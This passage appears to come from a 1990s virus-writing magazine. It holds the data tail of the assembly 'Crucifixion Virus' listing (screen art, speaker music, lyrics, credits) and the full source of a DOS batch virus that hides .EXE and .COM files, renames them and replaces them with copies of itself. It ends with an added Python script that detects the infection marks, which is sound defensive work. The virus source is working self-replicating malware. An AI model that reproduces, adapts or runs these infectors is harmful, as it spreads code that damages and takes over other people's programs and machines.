3,3,3,5,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,5,3,3,0 db 3,3,5,5,5,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,5,5,5,3,0 db 3,5,4,3,4,0ff,5,7,0ff,1,7,2,2,2,1,1,1,2,2,2,0ff,1,7,0ff,5,6,4,3,4,5,0 db 3,3,5,4,5,0ff,1,15d,2,2,1,1,1,2,2,0ff,1,14d,5,4,5,3,0 db 3,3,3,0ff,5,17d,0ff,1,7,0ff,5,16d,3,3,0 db 0ff,3,20d,5,0ff,1,5,5,3,0ff,3,17d,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,3,5,0ff,1,5,5,3,0 db 0ff,0,18d,3,2,5,0ff,1,5,5,2,0 db 0ff,0,18d,3,0ff,2,09,0 db 0ff,0,18d,0ff,2,0a,0 db 0ff,0,18d,0ff,2,0a,0 db 0ff,0,18d,0ff,2,5,1,2,2,2,1,2,0 db 0ff,0,18d,2,2,2,2,1,2,2,2,1,2,2,0 db 0ff,0,18d,2,5,2,1,1,5,2,1,1,2,2,0 db 0ff,0,18d,2,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,5,1,1,1,5,1,1,1,5,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,5,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,5,1,1,5,1,1,5,3,0 db 0ff,0,18d,3,3,4,3,4,5,4,3,4,3,0 db 0ff,0,18d,3,3,5,4,5,5,5,4,5,3,0 db 0ff,0,18d,3,3,3,0ff,5,5,3,3,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0 db 0ff,0,18d,0ff,3,0a,0,0 endcross: Arms1: db 3,3,3,5,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,5,3,3,0 db 3,3,5,5,5,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,5,5,5,3,0 db 3,5,4,3,4,0ff,5,7,0ff,1,7,2,2,2,1,1,1,2,2,2,0ff,1,7,0ff,5,6,4,3,4,5,0 db 3,3,5,4,5,0ff,1,15d,2,2,1,1,1,2,2,0ff,1,14d,5,4,5,3,0 db 3,3,3,0ff,5,17d,0ff,1,7,0ff,5,16d,3,3,0,0 EndArms1: Arms2: db 
3,3,3,3,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,3,3,3,0 db 3,3,3,5,5,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,5,3,3,3,0 db 3,3,3,5,4,0ff,5,7,0ff,1,7,2,2,2,1,1,1,2,2,2,0ff,1,7,0ff,5,6,4,5,3,3,0 db 3,3,3,5,5,0ff,1,15d,2,2,1,1,1,2,2,0ff,1,14d,5,5,3,3,0 db 3,3,3,0ff,5,17d,0ff,1,7,0ff,5,16d,3,3,0,0 EndArms2: Arms3: db 3,3,3,3,0ff,3,13d,5,5,2,2,2,1,1,1,2,2,2,5,5,0ff,3,12d,3,3,3,0 db 3,3,3,3,3,0ff,3,7,0ff,5,6,1,2,2,2,1,1,1,2,2,2,1,0ff,5,6,0ff,3,6,3,3,3,3,0 db 3,3,3,3,3,0ff,5,7,0ff,5,7,2,2,2,5,5,5,2,2,2,0ff,5,7,0ff,5,6,3,3,3,3,0 db 3,3,3,3,3,3,3,3,0ff,5,12d,2,2,4,4,4,2,2,0ff,5,12d,3,3,3,3,3,3,0 db 3,3,3,0ff,3,10d,0ff,5,10d,4,4,0ff,5,10d,0ff,3,0a,0,0 EndArms3: ;Music Data ; 1 = Turn On Speaker 2 = Turn Off Speaker ;-1 = Pause -2 = Screech ; 0 = End of data ; ; 3 = lyrics #1 ; 4 = lyrics #2 ; 5 = lyrics #3 ; 6 = final clap ;Most other numbers taken as data for outputting to Timer ; MusicData: ;If you're the messiah and you know it dw 3 dw 1,1473d,-1,2,1,1473d,-1,2,1,1084d,-1,2,1,1084d,-1,2,1,1084d,-1,2 dw 1,1084d,-1,2,1,1084d,-1,2,1,1084d,-1,2 ;clap your hands dw 4 dw 1,1193d,-1,2,1,1084d,-1,2,1,994d,-1,2 ;Scree! Scree! dw -1,-2,-1,-2,-1 ;If you're the messiah and you know it dw 3 dw 1,1473d,-1,2,1,1473d,-1,2,1,994d,-1,2,1,994d,-1,2,1,994d,-1,2 dw 1,994d,-1,2,1,994d,-1,2,1,994d,-1,2 ;clap your hands dw 4 dw 1,1084d,-1,2,1,994d,-1,2,1,883d,-1,2 ;Scree! Scree! dw -1,-2,-1,-2,-1 ;If you're the messiah and you know it dw 3 dw 1,1084d,-1,2,1,883d,-1,2,1,822d,-1,2,1,822d,-1,2,1,822d,-1,2 dw 1,883d,-1,2,1,1325d,-1,2,1,1325d,-1,2 ;Then your face will surely show it dw 5 dw 1,822d,-1,2,1,994d,-1,2,1,883d,-1,2,1,883d,-1,2,1,883d,-1,2 dw 1,994d,-1,2,1,1084d,-1,2,1,1084d,-1,2 ;If you're the messiah and you know it dw 3 dw 1,1084d,-1,2,1,883d,-1,2 dw 1,994d,-1,2,1,994d,-1,2,1,994d,-1,2,1,1084d,-1,2,1,1193d,-1,2 dw 1,1193d,-1,2 ;clap your hands dw 4 dw 1,1325d,-1,2,1,1193d,-1,2,1,1084d,-1,2 ;Scree! Scree! 
dw -1,6,-1,6,-1,0 Lyrics1 db 'If you''re the Messiah and you know it,',0 Lyrics2 db ' Clap your hands! ',0 Lyrics3 db ' Then your face will surely show it, ',0 Vname db '(rucifixion Virus 1.0',0 Credits db '(c) 1994, by Jesus of The Trinity',0 Attribs dw 0 TimeDate dw 0,0 MyStack dw 40 dup(0) ;dunno if this is needed, but it don't ;crash no more.... endCruc: end Crucifixion @REM  @echo off REM This is an actual virus written in the Batch programming (snicker) REM language. The art is by Moses and the programming is by Jesus. REM (and yes dammit I was bored - Jesus) REM - -----ÄÄÄÄÄÄÍÍÍÍÍÍÍð[TRiNiTy aNSi LoaDeR ViRuS] ðÍÍÍÍÍÍÍÄÄÄÄÄÄ----- - - ctty nul for %%f in (*.exe *.com) do set NeWHoST=%%f rename %NeWHoST% Å%NeWHoST% attrib +h Å%NeWHoST% copy %0.bat %NeWHoST% ren %NeWHoST% *.bat set NeWHoST= ctty con if errorlevel==1 goto DisplayLoader goto EndVirus :DisplayLoader REM - -----ÄÄÄÄÄÄÍÍÍÍÍÍÍðððððððððððððððððððððððððððððððÍÍÍÍÍÍÍÄÄÄÄÄÄ----- - - REM echo °²±°²±Ý echo ±²±±²±Þ echo °±±±±±±±±²±±±±±±±²Û°±±±±±±±± echo ²±²±±±±±²Û echo ±±²±±²Ý echo ±±±±±±Ý echo °°²°°²Ý echo °±² ßÛßßÜ Û ßÛÜ ßÜ Û °±²Ý echo ÜßÜ ßÜ echo °±² Û Û Û Û Û ° Û ° echo ±²Ý ßÜ Üß echo °±² ß±ßÛß ° Û Û ±  echo ° °±²ÞÜ ± echo °±² Û ß± ± ² ° ² ²  echo °±² þ ܲ echo °±²ÄÄßÄÄÄÄ echo ßÜÄßÜÄÜßÄÄÄßÜ echo ßÜÄÄßÜÄ°±²ÄÄ echo Ä¿Þ echo °±²Godúúúúúúúúú echo þúProgramÝer echo  °±² ³² echo ±ÝJesusúúúúúúúþúProgr echo aÞÜer ± Þ echo ³ÞHoly Spiritú echo þúPrograÝþer echo  ± ø echo ³ÝNoahúúúúúúúú echo þúOrganÛz echo eßÜWritßÜ ³ echo ³ÜMosesúúúúúúú echo þúArtiÞt echo /P.RÝ/WriÞ echo er ³ echo ÀÝÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij echo ÄÄÄÄijÄÄÄÄÄÝ echo ÄÄÙ echo ³ø echo ³ echo ³ echo ³ :EndVirus @echo  @Å%0 %1 %2 %3 %4 %5 %6 %7 %8 %9
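
The Genesis and Crucifixion listings above each mark an infected .COM file with a near jump plus an ID byte in its first four bytes and append their body at the old end of file, and the GIF virus listing renames an executed host so its extension ends in Z beside a same-named copy of itself. A defender's check for those on-disk traces follows as an added example that is not part of the original magazine. Assumptions: the function names and sample bytes are constructed for illustration, and 0C5h for the Crucifixion ID byte assumes the 'Å' in the listing is a CP437 character displayed as Latin-1.

```python
import struct
from typing import Optional

# ID byte at file offset 3, taken from the listings on this page:
#   Genesis:     jump_to_virus db 0e9, 00, 00, 0fe
#   Crucifixion: Jmpbytes db 0e9,0,0,'Å'   (assumed here to be CP437 byte 0C5h)
ID_BYTES = {0xFE: "Genesis", 0xC5: "Crucifixion"}


def check_com_header(data: bytes) -> Optional[dict]:
    """Return details if a .COM image carries one of the page's infection marks."""
    if len(data) < 4:
        return None
    # Both listings skip EXE-format files (their checks match MZ and ZM alike).
    if data[:2] in (b"MZ", b"ZM"):
        return None
    if data[0] != 0xE9 or data[3] not in ID_BYTES:
        return None
    # E9 rel16 is three bytes long and a .COM file loads at 100h, so the
    # jump target's file offset is 3 + rel16 (with 16-bit wraparound).
    rel16 = struct.unpack_from("<H", data, 1)[0]
    target = (3 + rel16) & 0xFFFF
    # The body is appended at the old end of file, so a genuine mark points
    # inside the file, past the 4-byte header. Anything else means the ID
    # byte is a coincidence in an ordinary program.
    if target < 4 or target >= len(data):
        return None
    return {
        "family": ID_BYTES[data[3]],
        "host_length": target,                  # size of the file before the append
        "appended_length": len(data) - target,  # bytes added after the host
    }


def renamed_host_pairs(names) -> list:
    """Find X.EXZ / X.COZ files sitting beside X.EXE / X.COM in one directory.

    The GIF virus listing changes the last letter of the host's extension to
    'Z' and writes its own copy under the original name, so the pair is the
    trace to look for. Use a listing taken from a clean boot: the resident
    code hides these entries from DOS directory searches.
    """
    upper = {n.upper() for n in names}
    pairs = []
    for name in sorted(upper):
        stem, dot, ext = name.rpartition(".")
        if dot and ext in ("EXZ", "COZ"):
            original = stem + "." + ext[:2] + ("E" if ext == "EXZ" else "M")
            if original in upper:
                pairs.append((original, name))
    return pairs


def build_sample(id_byte: int, host_len: int = 32, tail_len: int = 16) -> bytes:
    """Constructed test image: marked header, zero-filled host, NOP-filled tail.

    It contains no code from the listings, only the 4-byte header pattern.
    """
    header = b"\xE9" + struct.pack("<H", host_len - 3) + bytes([id_byte])
    return header + b"\x00" * (host_len - 4) + b"\x90" * tail_len


if __name__ == "__main__":
    print(check_com_header(build_sample(0xFE)))
    print(check_com_header(build_sample(0xC5, host_len=100, tail_len=50)))
    # Ordinary program that starts with a jump but has no ID byte.
    print(check_com_header(b"\xE9\x10\x00\x90" + b"\x00" * 40))
    # Constructed directory listing.
    print(renamed_host_pairs(["GAME.EXE", "GAME.EXZ", "EDIT.COM", "TOOL.COZ"]))
```

The header check is a triage signal, not proof: a clean program can start with a jump and happen to have one of these bytes at offset 3, which is why the jump target is validated before a hit is reported.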